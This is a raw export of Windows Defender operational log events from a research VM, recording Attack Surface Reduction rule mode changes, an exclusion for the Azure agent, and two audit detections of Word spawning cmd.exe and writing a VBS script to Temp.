TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1860 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1859 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1858 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1857 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1856 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1855 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1854 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1853 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1852 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1851 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1850 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1849 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1848 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1847 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1846 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1845 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1844 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1843 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1842 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1841 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1840 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1839 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1838 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1837 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1836 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/16/2023 04:39:37 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1833 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyPerRuleExclusions\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = C:\WindowsAzure\Packages\WaAppAgent.exe 11/16/2023 04:38:59 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1832 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyExclusions\C:\WindowsAzure\Packages\WaAppAgent.exe = 0x0 11/16/2023 04:24:09 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1122 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1829 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T16:24:09.858Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: cmd.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 04:24:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1122 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1828 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 3B576869-A4EC-4529-8536-B80A7769E899 Detection time: 2023-11-16T16:24:01.387Z User: researchvmhaa\research Path: C:\Users\research\AppData\Local\Temp\script.vbs Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1827 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1826 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1825 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1824 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1823 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1822 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1821 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1820 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1819 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1818 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 